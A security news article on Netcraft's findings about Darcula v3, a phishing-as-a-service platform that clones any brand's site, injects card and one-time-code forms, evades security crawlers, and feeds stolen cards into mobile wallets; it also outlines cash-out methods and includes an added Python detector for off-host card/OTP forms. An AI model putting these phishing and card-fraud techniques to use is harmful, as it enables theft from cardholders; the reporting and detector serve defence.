Darcula allows tech-illiterate crooks to create, deploy DIY phishing kits targeting any brand
A new, improved version of Darcula, a cat-themed phishing-as-a-service (PhaaS) platform aimed at serving Chinese-speaking criminals, will be released this month and will allow malicious users to create customized phishing kits to target a wider variety of brands than ever before, Netcraft researchers are warning.
Even users who have gotten wise to the fake “missed package” or “package confirmation” notices from their national post or delivery services may not be ready for the variety of phishing lures that may be coming their way.
The Darcula platform makes phishing easy
By automating some of the required steps, Darcula makes it easy for technically inexperienced criminals to launch phishing campaigns.
The current version of the platform offers pre-built phishing kits for targeting users of over 200 brands worldwide.
The biggest innovation baked into the soon to be released Darcula v3 is the ability for any user to generate a phishing kit for any brand, the researchers discovered.
All the user needs to do is to access the platform’s interface, insert the URL of the brand they want to impersonate, and the platform exports the HTML and all required assets to create lookalike phishing pages.
Users can choose which HTML element to replace and which type of phishing content to inject, and can restyle the phishing form to match the look and feel of the branded page.
An injected credit card form, with some of the text machine-translated into English. (Source: Netcraft)
The platform is able to create separate pages to perfect the illusion and maximize the extraction of information from targets: an initial lure page, a page that asks them to input their personal information and payment card info, and a page that asks them to enter the two-factor authentication code.
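As an added defender-side example (not code from Netcraft or the Darcula platform), the following Python heuristic flags a cloned brand page that carries an injected payment-card or one-time-code form submitting to a host other than the page's own; the field-name hints, the sample URL and the sample HTML are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Added example, not Netcraft's or Darcula's code. Field-name fragments that
# suggest card or 2FA capture (constructed list, not exhaustive).
SENSITIVE_HINTS = ("card", "cvv", "cvc", "expir", "otp", "2fa")

class FormCollector(HTMLParser):
    """Collect every <form> with its action and the names of its <input> fields."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = (attrs.get("name") or attrs.get("id") or "").lower()
            if name:
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def suspicious_forms(page_url, html):
    """Return (resolved action URL, matched field names) for each form that
    collects card/OTP data but submits to a host other than the page's own."""
    parser = FormCollector()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    hits = []
    for form in parser.forms:
        matched = [f for f in form["fields"] if any(h in f for h in SENSITIVE_HINTS)]
        if not matched:
            continue
        action = urljoin(page_url, form["action"])  # relative actions stay on-site
        if urlparse(action).hostname != page_host:
            hits.append((action, matched))
    return hits

# Constructed sample: the brand's own login form left intact, plus an injected
# card/OTP form posting to a collector host the page owner does not control.
SAMPLE_URL = "https://brand.example/login"
SAMPLE_HTML = ('<form action="/login"><input name="user"><input name="pass"></form>'
               '<form action="https://collector.invalid/s"><input name="card_number">'
               '<input name="cvv"><input id="otp_code"></form>')

if __name__ == "__main__":
    print(suspicious_forms(SAMPLE_URL, SAMPLE_HTML))
```

The same-host login form is not reported, so the heuristic separates a brand's genuine forms from the injected capture form even when both sit on one page.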
The phishing platform creates a “.cat-page” bundle containing all those pages, which can be uploaded to the Darcula admin panel and can then be used to launch phishing campaigns.
“The new admin panel also provides fraudsters a simplified user interface for managing credit cards, stolen credentials, active campaigns, and other details,” the researchers explained.
“These dashboards are not a crudely developed PHP script either — they are built on enterprise-grade systems including Docker, Node, React, SQLite, and various third-party NPM libraries. This attention to detail isn’t necessarily an effort to legitimize darcula but rather, make the experience easier and more accessible, just like any other SaaS platform.”
The phishing messages sent via Darcula – usually iMessages and Google Messages (which is based on the RCS standard) – can be sent out in bulk, either via “mass sender” scripts or device farms.
The platform is also able to implement advanced deception techniques to prevent/delay the discovery of campaigns. For example, web crawlers can be blocked, and so can access to the pages via non-mobile devices or from IP addresses known to belong to cybersecurity companies.
How the stolen payment information is leveraged by criminals
Darcula v3 can leverage the stolen card details to generate an image of the victim’s card, which makes it easier for crooks to add them to a digital wallet by simply scanning the image. (Researchers have found that even cards reported as stolen can be linked to crooks’ wallets.)
Example of a virtually-generated card from stolen card details (Source: Netcraft)
“These cards are often loaded to burner phones and then sold by darcula criminals. This behavior has been confirmed by fraudsters who publicize burner phones pre-loaded with up to 20 stolen cards per device via a Telegram chat adjacent to darcula,” Netcraft researchers noted.
Reporter Brian Krebs has recently illustrated how the adding of stolen cards to digital wallets usually happens.
“People who enter their payment card data at one of these sites will be told their financial institution needs to verify the small transaction by sending a one-time passcode to the customer’s mobile device. In reality, that code will be sent by the victim’s financial institution to verify that the user indeed wishes to link their card information to a mobile wallet,” he explained.
“If the victim then provides that one-time code, the phishers will link the card data to a new mobile wallet from Apple or Google, loading the wallet onto a mobile phone that the scammers control.”
Citing SecAlliance security researcher Ford Merrill, Krebs further described how criminals then use those cards/wallets to steal money by:
- Setting up fake e-commerce businesses on Stripe or Zelle and making transactions through them
- Performing “Tap-to-pay” on point-of-sale (PoS) terminals they’ve obtained
- Using an Android app that can relay valid NFC-enabled tap-to-pay transactions from phones located across the globe, either to pay via a PoS terminal or take money out of ATMs